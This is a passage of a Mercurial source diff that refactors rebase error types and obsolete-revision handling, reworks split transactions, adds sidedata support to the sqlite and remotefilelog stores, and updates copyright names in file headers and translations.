branches.add(repo[rev].branch())
if len(branches) > 1:
- raise error.Abort(
+ raise error.InputError(
_(b'cannot collapse multiple named branches')
)
- # Calculate self.obsoletenotrebased
- obsrevs = _filterobsoleterevs(self.repo, self.state)
- self._handleskippingobsolete(obsrevs, self.destmap)
-
# Keep track of the active bookmarks in order to reset them later
self.activebookmark = self.activebookmark or repo._activebookmark
if self.activebookmark:
@@ -490,19 +509,10 @@
def progress(ctx):
p.increment(item=(b"%d:%s" % (ctx.rev(), ctx)))
- allowdivergence = self.ui.configbool(
- b'experimental', b'evolution.allowdivergence'
- )
for subset in sortsource(self.destmap):
sortedrevs = self.repo.revs(b'sort(%ld, -topo)', subset)
- if not allowdivergence:
- sortedrevs -= self.repo.revs(
- b'descendants(%ld) and not %ld',
- self.obsoletewithoutsuccessorindestination,
- self.obsoletewithoutsuccessorindestination,
- )
for rev in sortedrevs:
- self._rebasenode(tr, rev, allowdivergence, progress)
+ self._rebasenode(tr, rev, progress)
p.complete()
ui.note(_(b'rebase merging completed\n'))
@@ -564,16 +574,13 @@
return newnode
- def _rebasenode(self, tr, rev, allowdivergence, progressfn):
+ def _rebasenode(self, tr, rev, progressfn):
repo, ui, opts = self.repo, self.ui, self.opts
ctx = repo[rev]
desc = _ctxdesc(ctx)
if self.state[rev] == rev:
ui.status(_(b'already rebased %s\n') % desc)
- elif (
- not allowdivergence
- and rev in self.obsoletewithoutsuccessorindestination
- ):
+ elif rev in self.obsolete_with_successor_in_rebase_set:
msg = (
_(
b'note: not rebasing %s and its descendants as '
@@ -583,8 +590,8 @@
)
repo.ui.status(msg)
self.skipped.add(rev)
- elif rev in self.obsoletenotrebased:
- succ = self.obsoletenotrebased[rev]
+ elif rev in self.obsolete_with_successor_in_destination:
+ succ = self.obsolete_with_successor_in_destination[rev]
if succ is None:
msg = _(b'note: not rebasing %s, it has no successor\n') % desc
else:
@@ -610,7 +617,7 @@
self.destmap,
self.state,
self.skipped,
- self.obsoletenotrebased,
+ self.obsolete_with_successor_in_destination,
)
if self.resume and self.wctx.p1().rev() == p1:
repo.ui.debug(b'resuming interrupted rebase\n')
@@ -722,7 +729,7 @@
self.destmap,
self.state,
self.skipped,
- self.obsoletenotrebased,
+ self.obsolete_with_successor_in_destination,
)
editopt = opts.get(b'edit')
editform = b'rebase.collapse'
@@ -1085,10 +1092,10 @@
with repo.wlock(), repo.lock():
rbsrt.restorestatus()
if rbsrt.collapsef:
- raise error.Abort(_(b"cannot stop in --collapse session"))
+ raise error.StateError(_(b"cannot stop in --collapse session"))
allowunstable = obsolete.isenabled(repo, obsolete.allowunstableopt)
if not (rbsrt.keepf or allowunstable):
- raise error.Abort(
+ raise error.StateError(
_(
b"cannot remove original changesets with"
b" unrebased descendants"
@@ -1112,6 +1119,8 @@
with ui.configoverride(overrides, b'rebase'):
return _dorebase(ui, repo, action, opts, inmemory=inmemory)
except error.InMemoryMergeConflictsError:
+ if ui.configbool(b'devel', b'rebase.force-in-memory-merge'):
+ raise
ui.warn(
_(
b'hit merge conflicts; re-running rebase without in-memory'
@@ -1210,14 +1219,16 @@
)
% help
)
- raise error.Abort(msg)
+ raise error.InputError(msg)
if rbsrt.collapsemsg and not rbsrt.collapsef:
- raise error.Abort(_(b'message can only be specified with collapse'))
+ raise error.InputError(
+ _(b'message can only be specified with collapse')
+ )
if action:
if rbsrt.collapsef:
- raise error.Abort(
+ raise error.InputError(
_(b'cannot use collapse with continue or abort')
)
if action == b'abort' and opts.get(b'tool', False):
@@ -1284,7 +1295,7 @@
cmdutil.bailifchanged(repo)
if ui.configbool(b'commands', b'rebase.requiredest') and not destf:
- raise error.Abort(
+ raise error.InputError(
_(b'you must specify a destination'),
hint=_(b'use: hg rebase -d REV'),
)
@@ -1378,7 +1389,7 @@
return None
if wdirrev in rebaseset:
- raise error.Abort(_(b'cannot rebase the working copy'))
+ raise error.InputError(_(b'cannot rebase the working copy'))
rebasingwcp = repo[b'.'].rev() in rebaseset
ui.log(
b"rebase",
@@ -1416,7 +1427,7 @@
elif size == 0:
ui.note(_(b'skipping %s - empty destination\n') % repo[r])
else:
- raise error.Abort(
+ raise error.InputError(
_(b'rebase destination for %s is not unique') % repo[r]
)
@@ -1449,7 +1460,7 @@
return nullrev
if len(parents) == 1:
return parents.pop()
- raise error.Abort(
+ raise error.StateError(
_(
b'unable to collapse on top of %d, there is more '
b'than one external parent: %s'
@@ -1649,7 +1660,7 @@
b"to force the rebase please set "
b"experimental.evolution.allowdivergence=True"
)
- raise error.Abort(msg % (b",".join(divhashes),), hint=h)
+ raise error.StateError(msg % (b",".join(divhashes),), hint=h)
def successorrevs(unfi, rev):
@@ -1752,7 +1763,7 @@
# /| # None of A and B will be changed to D and rebase fails.
# A B D
if set(newps) == set(oldps) and dest not in newps:
- raise error.Abort(
+ raise error.InputError(
_(
b'cannot rebase %d:%s without '
b'moving at least one of its parents'
@@ -1764,7 +1775,7 @@
# impossible. With multi-dest, the initial check does not cover complex
# cases since we don't have abstractions to dry-run rebase cheaply.
if any(p != nullrev and isancestor(rev, p) for p in newps):
- raise error.Abort(_(b'source is ancestor of destination'))
+ raise error.InputError(_(b'source is ancestor of destination'))
# Check if the merge will contain unwanted changes. That may happen if
# there are multiple special (non-changelog ancestor) merge bases, which
@@ -1826,7 +1837,7 @@
if revs is not None
)
)
- raise error.Abort(
+ raise error.InputError(
_(b'rebasing %d:%s will include unwanted changes from %s')
% (rev, repo[rev], unwanteddesc)
)
@@ -1971,7 +1982,7 @@
if destmap[r] not in srcset:
result.append(r)
if not result:
- raise error.Abort(_(b'source and destination form a cycle'))
+ raise error.InputError(_(b'source and destination form a cycle'))
srcset -= set(result)
yield result
@@ -1991,12 +2002,12 @@
if b'qtip' in repo.tags():
mqapplied = {repo[s.node].rev() for s in repo.mq.applied}
if set(destmap.values()) & mqapplied:
- raise error.Abort(_(b'cannot rebase onto an applied mq patch'))
+ raise error.StateError(_(b'cannot rebase onto an applied mq patch'))
# Get "cycle" error early by exhausting the generator.
sortedsrc = list(sortsource(destmap)) # a list of sorted revs
if not sortedsrc:
- raise error.Abort(_(b'no matching revisions'))
+ raise error.InputError(_(b'no matching revisions'))
# Only check the first batch of revisions to rebase not depending on other
# rebaseset. This means "source is ancestor of destination" for the second
@@ -2004,7 +2015,7 @@
# "defineparents" to do that check.
roots = list(repo.set(b'roots(%ld)', sortedsrc[0]))
if not roots:
- raise error.Abort(_(b'no matching revisions'))
+ raise error.InputError(_(b'no matching revisions'))
def revof(r):
return r.rev()
@@ -2016,7 +2027,7 @@
dest = repo[destmap[root.rev()]]
commonbase = root.ancestor(dest)
if commonbase == root:
- raise error.Abort(_(b'source is ancestor of destination'))
+ raise error.InputError(_(b'source is ancestor of destination'))
if commonbase == dest:
wctx = repo[None]
if dest == wctx.p1():
@@ -2109,7 +2120,7 @@
if ui.configbool(b'commands', b'rebase.requiredest'):
msg = _(b'rebase destination required by configuration')
hint = _(b'use hg pull followed by hg rebase -d DEST')
- raise error.Abort(msg, hint=hint)
+ raise error.InputError(msg, hint=hint)
with repo.wlock(), repo.lock():
if opts.get('update'):
@@ -2166,34 +2177,24 @@
commands.update(ui, repo)
else:
if opts.get('tool'):
- raise error.Abort(_(b'--tool can only be used with --rebase'))
+ raise error.InputError(_(b'--tool can only be used with --rebase'))
ret = orig(ui, repo, *args, **opts)
return ret
-def _filterobsoleterevs(repo, revs):
- """returns a set of the obsolete revisions in revs"""
- return {r for r in revs if repo[r].obsolete()}
-
+def _compute_obsolete_sets(repo, rebaseobsrevs, destmap):
+ """Figure out what to do about about obsolete revisions
-def _computeobsoletenotrebased(repo, rebaseobsrevs, destmap):
- """Return (obsoletenotrebased, obsoletewithoutsuccessorindestination).
-
- `obsoletenotrebased` is a mapping mapping obsolete => successor for all
+ `obsolete_with_successor_in_destination` is a mapping mapping obsolete => successor for all
obsolete nodes to be rebased given in `rebaseobsrevs`.
- `obsoletewithoutsuccessorindestination` is a set with obsolete revisions
- without a successor in destination.
-
- `obsoleteextinctsuccessors` is a set of obsolete revisions with only
- obsolete successors.
+ `obsolete_with_successor_in_rebase_set` is a set with obsolete revisions,
+ without a successor in destination, that would cause divergence.
"""
- obsoletenotrebased = {}
- obsoletewithoutsuccessorindestination = set()
- obsoleteextinctsuccessors = set()
+ obsolete_with_successor_in_destination = {}
+ obsolete_with_successor_in_rebase_set = set()
- assert repo.filtername is None
cl = repo.changelog
get_rev = cl.index.get_rev
extinctrevs = set(repo.revs(b'extinct()'))
@@ -2205,29 +2206,25 @@
successors.remove(srcnode)
succrevs = {get_rev(s) for s in successors}
succrevs.discard(None)
- if succrevs.issubset(extinctrevs):
- # all successors are extinct
- obsoleteextinctsuccessors.add(srcrev)
- if not successors:
- # no successor
- obsoletenotrebased[srcrev] = None
+ if not successors or succrevs.issubset(extinctrevs):
+ # no successor, or all successors are extinct
+ obsolete_with_successor_in_destination[srcrev] = None
else:
dstrev = destmap[srcrev]
for succrev in succrevs:
if cl.isancestorrev(succrev, dstrev):
- obsoletenotrebased[srcrev] = succrev
+ obsolete_with_successor_in_destination[srcrev] = succrev
break
else:
# If 'srcrev' has a successor in rebase set but none in
# destination (which would be catched above), we shall skip it
# and its descendants to avoid divergence.
if srcrev in extinctrevs or any(s in destmap for s in succrevs):
- obsoletewithoutsuccessorindestination.add(srcrev)
+ obsolete_with_successor_in_rebase_set.add(srcrev)
return (
- obsoletenotrebased,
- obsoletewithoutsuccessorindestination,
- obsoleteextinctsuccessors,
+ obsolete_with_successor_in_destination,
+ obsolete_with_successor_in_rebase_set,
)
--- a/hgext/releasenotes.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/releasenotes.py Tue Apr 20 11:01:06 2021 -0400
@@ -280,7 +280,7 @@
if b'.hgreleasenotes' in ctx:
read(b'.hgreleasenotes')
- return p[b'sections']
+ return p.items(b'sections')
def checkadmonitions(ui, repo, directives, revs):
--- a/hgext/relink.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/relink.py Tue Apr 20 11:01:06 2021 -0400
@@ -19,7 +19,10 @@
registrar,
util,
)
-from mercurial.utils import stringutil
+from mercurial.utils import (
+ stringutil,
+ urlutil,
+)
cmdtable = {}
command = registrar.command(cmdtable)
@@ -62,10 +65,11 @@
util, b'samedevice'
):
raise error.Abort(_(b'hardlinks are not supported on this system'))
- src = hg.repository(
- repo.baseui,
- ui.expandpath(origin or b'default-relink', origin or b'default'),
- )
+
+ if origin is None and b'default-relink' in ui.paths:
+ origin = b'default-relink'
+ path, __ = urlutil.get_unique_pull_path(b'relink', repo, ui, origin)
+ src = hg.repository(repo.baseui, path)
ui.status(_(b'relinking %s to %s\n') % (src.store.path, repo.store.path))
if repo.root == src.root:
ui.status(_(b'there is nothing to relink\n'))
--- a/hgext/remotefilelog/__init__.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/remotefilelog/__init__.py Tue Apr 20 11:01:06 2021 -0400
@@ -215,6 +215,8 @@
configitem(b'remotefilelog', b'backgroundprefetch', default=False)
configitem(b'remotefilelog', b'prefetchdelay', default=120)
configitem(b'remotefilelog', b'prefetchdays', default=14)
+# Other values include 'local' or 'none'. Any unrecognized value is 'all'.
+configitem(b'remotefilelog', b'strip.includefiles', default='all')
configitem(b'remotefilelog', b'getfilesstep', default=10000)
configitem(b'remotefilelog', b'getfilestype', default=b'optimistic')
@@ -886,7 +888,7 @@
progress.update(count)
count += 1
try:
- path = ui.expandpath(os.path.normpath(path))
+ path = util.expandpath(os.path.normpath(path))
except TypeError as e:
ui.warn(_(b"warning: malformed path: %r:%s\n") % (path, e))
traceback.print_exc()
--- a/hgext/remotefilelog/connectionpool.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/remotefilelog/connectionpool.py Tue Apr 20 11:01:06 2021 -0400
@@ -8,7 +8,6 @@
from __future__ import absolute_import
from mercurial import (
- extensions,
hg,
pycompat,
sshpeer,
@@ -43,17 +42,19 @@
if conn is None:
- def _cleanup(orig):
- # close pipee first so peer.cleanup reading it won't deadlock,
- # if there are other processes with pipeo open (i.e. us).
- peer = orig.im_self
- if util.safehasattr(peer, 'pipee'):
- peer.pipee.close()
- return orig()
+ peer = hg.peer(self._repo.ui, {}, path)
+ if util.safehasattr(peer, '_cleanup'):
- peer = hg.peer(self._repo.ui, {}, path)
- if util.safehasattr(peer, 'cleanup'):
- extensions.wrapfunction(peer, b'cleanup', _cleanup)
+ class mypeer(peer.__class__):
+ def _cleanup(self, warn=None):
+ # close pipee first so peer.cleanup reading it won't
+ # deadlock, if there are other processes with pipeo
+ # open (i.e. us).
+ if util.safehasattr(self, 'pipee'):
+ self.pipee.close()
+ return super(mypeer, self)._cleanup()
+
+ peer.__class__ = mypeer
conn = connection(pathpool, peer)
--- a/hgext/remotefilelog/contentstore.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/remotefilelog/contentstore.py Tue Apr 20 11:01:06 2021 -0400
@@ -365,7 +365,7 @@
ledger.markdataentry(self, treename, node)
ledger.markhistoryentry(self, treename, node)
- for path, encoded, size in self._store.datafiles():
+ for t, path, encoded, size in self._store.datafiles():
if path[:5] != b'meta/' or path[-2:] != b'.i':
continue
--- a/hgext/remotefilelog/remotefilelog.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/remotefilelog/remotefilelog.py Tue Apr 20 11:01:06 2021 -0400
@@ -155,12 +155,12 @@
# text passed to "addrevision" includes hg filelog metadata header
if node is None:
node = storageutil.hashrevisionsha1(text, p1, p2)
- if sidedata is None:
- sidedata = {}
meta, metaoffset = storageutil.parsemeta(text)
rawtext, validatehash = flagutil.processflagswrite(
- self, text, flags, sidedata=sidedata
+ self,
+ text,
+ flags,
)
return self.addrawrevision(
rawtext,
@@ -306,6 +306,7 @@
assumehaveparentrevisions=False,
deltaprevious=False,
deltamode=None,
+ sidedata_helpers=None,
):
# we don't use any of these parameters here
del nodesorder, revisiondata, assumehaveparentrevisions, deltaprevious
@@ -333,6 +334,8 @@
baserevisionsize=None,
revision=revision,
delta=delta,
+ # Sidedata is not supported yet
+ sidedata=None,
)
def revdiff(self, node1, node2):
--- a/hgext/remotefilelog/remotefilelogserver.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/remotefilelog/remotefilelogserver.py Tue Apr 20 11:01:06 2021 -0400
@@ -164,24 +164,26 @@
b'.d'
):
n = util.pconvert(fp[striplen:])
- yield (store.decodedir(n), n, st.st_size)
+ d = store.decodedir(n)
+ t = store.FILETYPE_OTHER
+ yield (t, d, n, st.st_size)
if kind == stat.S_IFDIR:
visit.append(fp)
if scmutil.istreemanifest(repo):
- for (u, e, s) in repo.store.datafiles():
+ for (t, u, e, s) in repo.store.datafiles():
if u.startswith(b'meta/') and (
u.endswith(b'.i') or u.endswith(b'.d')
):
- yield (u, e, s)
+ yield (t, u, e, s)
# Return .d and .i files that do not match the shallow pattern
match = state.match
if match and not match.always():
- for (u, e, s) in repo.store.datafiles():
+ for (t, u, e, s) in repo.store.datafiles():
f = u[5:-2] # trim data/... and .i/.d
if not state.match(f):
- yield (u, e, s)
+ yield (t, u, e, s)
for x in repo.store.topfiles():
if state.noflatmf and x[0][:11] == b'00manifest.':
--- a/hgext/remotefilelog/shallowbundle.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/remotefilelog/shallowbundle.py Tue Apr 20 11:01:06 2021 -0400
@@ -67,7 +67,7 @@
shallowcg1packer, self, nodelist, rlog, lookup, units=units
)
- def generatefiles(self, changedfiles, *args):
+ def generatefiles(self, changedfiles, *args, **kwargs):
try:
linknodes, commonrevs, source = args
except ValueError:
@@ -92,7 +92,9 @@
[f for f in changedfiles if not repo.shallowmatch(f)]
)
- return super(shallowcg1packer, self).generatefiles(changedfiles, *args)
+ return super(shallowcg1packer, self).generatefiles(
+ changedfiles, *args, **kwargs
+ )
def shouldaddfilegroups(self, source):
repo = self._repo
@@ -102,6 +104,18 @@
if source == b"push" or source == b"bundle":
return AllFiles
+ # We won't actually strip the files, but we should put them in any
+ # backup bundle generated by strip (especially for cases like narrow's
+ # `hg tracked --removeinclude`, as failing to do so means that the
+ # "saved" changesets during a strip won't have their files reapplied and
+ # thus their linknode adjusted, if necessary).
+ if source == b"strip":
+ cfg = repo.ui.config(b'remotefilelog', b'strip.includefiles')
+ if cfg == b'local':
+ return LocalFiles
+ elif cfg != b'none':
+ return AllFiles
+
caps = self._bundlecaps or []
if source == b"serve" or source == b"pull":
if constants.BUNDLE2_CAPABLITY in caps:
@@ -176,9 +190,11 @@
repo.shallowmatch = original
-def addchangegroupfiles(orig, repo, source, revmap, trp, expectedfiles, *args):
+def addchangegroupfiles(
+ orig, repo, source, revmap, trp, expectedfiles, *args, **kwargs
+):
if not shallowutil.isenabled(repo):
- return orig(repo, source, revmap, trp, expectedfiles, *args)
+ return orig(repo, source, revmap, trp, expectedfiles, *args, **kwargs)
newfiles = 0
visited = set()
@@ -272,7 +288,7 @@
revisiondata = revisiondatas[(f, node)]
# revisiondata: (node, p1, p2, cs, deltabase, delta, flags)
- node, p1, p2, linknode, deltabase, delta, flags = revisiondata
+ node, p1, p2, linknode, deltabase, delta, flags, sidedata = revisiondata
if not available(f, node, f, deltabase):
continue
--- a/hgext/schemes.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/schemes.py Tue Apr 20 11:01:06 2021 -0400
@@ -52,7 +52,9 @@
pycompat,
registrar,
templater,
- util,
+)
+from mercurial.utils import (
+ urlutil,
)
cmdtable = {}
@@ -86,7 +88,7 @@
)
def resolve(self, url):
- # Should this use the util.url class, or is manual parsing better?
+ # Should this use the urlutil.url class, or is manual parsing better?
try:
url = url.split(b'://', 1)[1]
except IndexError:
@@ -137,7 +139,7 @@
)
hg.schemes[scheme] = ShortRepository(url, scheme, t)
- extensions.wrapfunction(util, b'hasdriveletter', hasdriveletter)
+ extensions.wrapfunction(urlutil, b'hasdriveletter', hasdriveletter)
@command(b'debugexpandscheme', norepo=True)
--- a/hgext/share.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/share.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,4 +1,4 @@
-# Copyright 2006, 2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2006, 2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/hgext/split.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/split.py Tue Apr 20 11:01:06 2021 -0400
@@ -12,7 +12,7 @@
from mercurial.i18n import _
from mercurial.node import (
- nullid,
+ nullrev,
short,
)
@@ -27,6 +27,7 @@
revsetlang,
rewriteutil,
scmutil,
+ util,
)
# allow people to use split without explicitly enabling rebase extension
@@ -69,57 +70,62 @@
if opts.get(b'rev'):
revlist.append(opts.get(b'rev'))
revlist.extend(revs)
- with repo.wlock(), repo.lock(), repo.transaction(b'split') as tr:
- revs = scmutil.revrange(repo, revlist or [b'.'])
- if len(revs) > 1:
- raise error.InputError(_(b'cannot split multiple revisions'))
+ with repo.wlock(), repo.lock():
+ tr = repo.transaction(b'split')
+ # If the rebase somehow runs into conflicts, make sure
+ # we close the transaction so the user can continue it.
+ with util.acceptintervention(tr):
+ revs = scmutil.revrange(repo, revlist or [b'.'])
+ if len(revs) > 1:
+ raise error.InputError(_(b'cannot split multiple revisions'))
- rev = revs.first()
- ctx = repo[rev]
- # Handle nullid specially here (instead of leaving for precheck()
- # below) so we get a nicer message and error code.
- if rev is None or ctx.node() == nullid:
- ui.status(_(b'nothing to split\n'))
- return 1
- if ctx.node() is None:
- raise error.InputError(_(b'cannot split working directory'))
+ rev = revs.first()
+ # Handle nullrev specially here (instead of leaving for precheck()
+ # below) so we get a nicer message and error code.
+ if rev is None or rev == nullrev:
+ ui.status(_(b'nothing to split\n'))
+ return 1
+ ctx = repo[rev]
+ if ctx.node() is None:
+ raise error.InputError(_(b'cannot split working directory'))
- if opts.get(b'rebase'):
- # Skip obsoleted descendants and their descendants so the rebase
- # won't cause conflicts for sure.
- descendants = list(repo.revs(b'(%d::) - (%d)', rev, rev))
- torebase = list(
- repo.revs(
- b'%ld - (%ld & obsolete())::', descendants, descendants
+ if opts.get(b'rebase'):
+ # Skip obsoleted descendants and their descendants so the rebase
+ # won't cause conflicts for sure.
+ descendants = list(repo.revs(b'(%d::) - (%d)', rev, rev))
+ torebase = list(
+ repo.revs(
+ b'%ld - (%ld & obsolete())::', descendants, descendants
+ )
)
- )
- else:
- torebase = []
- rewriteutil.precheck(repo, [rev] + torebase, b'split')
+ else:
+ torebase = []
+ rewriteutil.precheck(repo, [rev] + torebase, b'split')
- if len(ctx.parents()) > 1:
- raise error.InputError(_(b'cannot split a merge changeset'))
+ if len(ctx.parents()) > 1:
+ raise error.InputError(_(b'cannot split a merge changeset'))
- cmdutil.bailifchanged(repo)
+ cmdutil.bailifchanged(repo)
- # Deactivate bookmark temporarily so it won't get moved unintentionally
- bname = repo._activebookmark
- if bname and repo._bookmarks[bname] != ctx.node():
- bookmarks.deactivate(repo)
+ # Deactivate bookmark temporarily so it won't get moved
+ # unintentionally
+ bname = repo._activebookmark
+ if bname and repo._bookmarks[bname] != ctx.node():
+ bookmarks.deactivate(repo)
- wnode = repo[b'.'].node()
- top = None
- try:
- top = dosplit(ui, repo, tr, ctx, opts)
- finally:
- # top is None: split failed, need update --clean recovery.
- # wnode == ctx.node(): wnode split, no need to update.
- if top is None or wnode != ctx.node():
- hg.clean(repo, wnode, show_stats=False)
- if bname:
- bookmarks.activate(repo, bname)
- if torebase and top:
- dorebase(ui, repo, torebase, top)
+ wnode = repo[b'.'].node()
+ top = None
+ try:
+ top = dosplit(ui, repo, tr, ctx, opts)
+ finally:
+ # top is None: split failed, need update --clean recovery.
+ # wnode == ctx.node(): wnode split, no need to update.
+ if top is None or wnode != ctx.node():
+ hg.clean(repo, wnode, show_stats=False)
+ if bname:
+ bookmarks.activate(repo, bname)
+ if torebase and top:
+ dorebase(ui, repo, torebase, top)
def dosplit(ui, repo, tr, ctx, opts):
@@ -165,19 +171,26 @@
b'message': header + ctx.description(),
}
)
+ origctx = repo[b'.']
commands.commit(ui, repo, **pycompat.strkwargs(opts))
newctx = repo[b'.']
- committed.append(newctx)
+ # Ensure user didn't do a "no-op" split (such as deselecting
+ # everything).
+ if origctx.node() != newctx.node():
+ committed.append(newctx)
if not committed:
raise error.InputError(_(b'cannot split an empty revision'))
- scmutil.cleanupnodes(
- repo,
- {ctx.node(): [c.node() for c in committed]},
- operation=b'split',
- fixphase=True,
- )
+ if len(committed) != 1 or committed[0].node() != ctx.node():
+ # Ensure we don't strip a node if we produce the same commit as already
+ # exists
+ scmutil.cleanupnodes(
+ repo,
+ {ctx.node(): [c.node() for c in committed]},
+ operation=b'split',
+ fixphase=True,
+ )
return committed[-1]
--- a/hgext/sqlitestore.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/sqlitestore.py Tue Apr 20 11:01:06 2021 -0400
@@ -54,6 +54,7 @@
from mercurial.node import (
nullid,
nullrev,
+ sha1nodeconstants,
short,
)
from mercurial.thirdparty import attr
@@ -288,6 +289,7 @@
baserevisionsize = attr.ib()
revision = attr.ib()
delta = attr.ib()
+ sidedata = attr.ib()
linknode = attr.ib(default=None)
@@ -304,6 +306,7 @@
"""Implements storage for an individual tracked path."""
def __init__(self, db, path, compression):
+ self.nullid = sha1nodeconstants.nullid
self._db = db
self._path = path
@@ -586,6 +589,7 @@
revisiondata=False,
assumehaveparentrevisions=False,
deltamode=repository.CG_DELTAMODE_STD,
+ sidedata_helpers=None,
):
if nodesorder not in (b'nodes', b'storage', b'linear', None):
raise error.ProgrammingError(
@@ -624,6 +628,7 @@
revisiondata=revisiondata,
assumehaveparentrevisions=assumehaveparentrevisions,
deltamode=deltamode,
+ sidedata_helpers=sidedata_helpers,
):
yield delta
@@ -636,7 +641,8 @@
if meta or filedata.startswith(b'\x01\n'):
filedata = storageutil.packmeta(meta, filedata)
- return self.addrevision(filedata, transaction, linkrev, p1, p2)
+ rev = self.addrevision(filedata, transaction, linkrev, p1, p2)
+ return self.node(rev)
def addrevision(
self,
@@ -658,15 +664,16 @@
if validatehash:
self._checkhash(revisiondata, node, p1, p2)
- if node in self._nodetorev:
- return node
+ rev = self._nodetorev.get(node)
+ if rev is not None:
+ return rev
- node = self._addrawrevision(
+ rev = self._addrawrevision(
node, revisiondata, transaction, linkrev, p1, p2
)
self._revisioncache[node] = revisiondata
- return node
+ return rev
def addgroup(
self,
@@ -679,7 +686,16 @@
):
empty = True
- for node, p1, p2, linknode, deltabase, delta, wireflags in deltas:
+ for (
+ node,
+ p1,
+ p2,
+ linknode,
+ deltabase,
+ delta,
+ wireflags,
+ sidedata,
+ ) in deltas:
storeflags = 0
if wireflags & repository.REVISION_FLAG_CENSORED:
@@ -741,7 +757,7 @@
)
if duplicaterevisioncb:
- duplicaterevisioncb(self, node)
+ duplicaterevisioncb(self, self.rev(node))
empty = False
continue
@@ -752,7 +768,7 @@
text = None
storedelta = (deltabase, delta)
- self._addrawrevision(
+ rev = self._addrawrevision(
node,
text,
transaction,
@@ -764,7 +780,7 @@
)
if addrevisioncb:
- addrevisioncb(self, node)
+ addrevisioncb(self, rev)
empty = False
return not empty
@@ -897,6 +913,10 @@
def files(self):
return []
+ def sidedata(self, nodeorrev, _df=None):
+ # Not supported for now
+ return {}
+
def storageinfo(
self,
exclusivefiles=False,
@@ -1079,7 +1099,7 @@
self._revtonode[rev] = node
self._revisions[node] = entry
- return node
+ return rev
class sqliterepository(localrepo.localrepository):
--- a/hgext/transplant.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/transplant.py Tue Apr 20 11:01:06 2021 -0400
@@ -47,6 +47,7 @@
from mercurial.utils import (
procutil,
stringutil,
+ urlutil,
)
@@ -818,7 +819,8 @@
sourcerepo = opts.get(b'source')
if sourcerepo:
- peer = hg.peer(repo, opts, ui.expandpath(sourcerepo))
+ u = urlutil.get_unique_pull_path(b'transplant', repo, ui, sourcerepo)[0]
+ peer = hg.peer(repo, opts, u)
heads = pycompat.maplist(peer.lookup, opts.get(b'branch', ()))
target = set(heads)
for r in revs:
--- a/hgext/uncommit.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/uncommit.py Tue Apr 20 11:01:06 2021 -0400
@@ -175,7 +175,7 @@
old = repo[b'.']
rewriteutil.precheck(repo, [old.rev()], b'uncommit')
if len(old.parents()) > 1:
- raise error.Abort(_(b"cannot uncommit merge changeset"))
+ raise error.InputError(_(b"cannot uncommit merge changeset"))
match = scmutil.match(old, pats, opts)
@@ -202,7 +202,7 @@
else:
hint = _(b"file does not exist")
- raise error.Abort(
+ raise error.InputError(
_(b'cannot uncommit "%s"') % scmutil.getuipathfn(repo)(f),
hint=hint,
)
@@ -280,7 +280,7 @@
markers = list(predecessormarkers(curctx))
if len(markers) != 1:
e = _(b"changeset must have one predecessor, found %i predecessors")
- raise error.Abort(e % len(markers))
+ raise error.InputError(e % len(markers))
prednode = markers[0].prednode()
predctx = unfi[prednode]
--- a/hgext/win32text.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/win32text.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# win32text.py - LF <-> CRLF/CR translation utilities for Windows/Mac users
#
-# Copyright 2005, 2007-2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2005, 2007-2009 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/hgext/zeroconf/__init__.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/zeroconf/__init__.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# zeroconf.py - zeroconf support for Mercurial
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/i18n/da.po Thu Mar 25 19:06:28 2021 -0400
+++ b/i18n/da.po Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# Danish translations for Mercurial
# Danske oversættelser for Mercurial
-# Copyright (C) 2009, 2010 Matt Mackall and others
+# Copyright (C) 2009, 2010 Olivia Mackall and others
#
# Translation dictionary:
#
@@ -11359,11 +11359,11 @@
msgstr "(se http://mercurial.selenic.com for mere information)"
msgid ""
-"Copyright (C) 2005-2011 Matt Mackall and others\n"
+"Copyright (C) 2005-2011 Olivia Mackall and others\n"
"This is free software; see the source for copying conditions. There is NO\n"
"warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n"
msgstr ""
-"Copyright (C) 2005-2011 Matt Mackall og andre\n"
+"Copyright (C) 2005-2011 Olivia Mackall og andre\n"
"Dette er frit programmel; se kildekoden for kopieringsbetingelser. Der\n"
"gives INGEN GARANTI; ikke engang for SALGBARHED eller EGNETHED FOR\n"
"NOGET BESTEMT FORMÅL.\n"
--- a/i18n/de.po Thu Mar 25 19:06:28 2021 -0400
+++ b/i18n/de.po Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# German translations for Mercurial
# Deutsche Übersetzungen für Mercurial
-# Copyright (C) 2009 Matt Mackall and others
+# Copyright (C) 2009 Olivia Mackall and others
#
# Übersetzer:
# Tobias Bell
@@ -14536,11 +14536,11 @@
msgstr "(siehe http://mercurial.selenic.com für mehr Information)"
msgid ""
-"Copyright (C) 2005-2014 Matt Mackall and others\n"
+"Copyright (C) 2005-2014 Olivia Mackall and others\n"
"This is free software; see the source for copying conditions. There is NO\n"
"warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n"
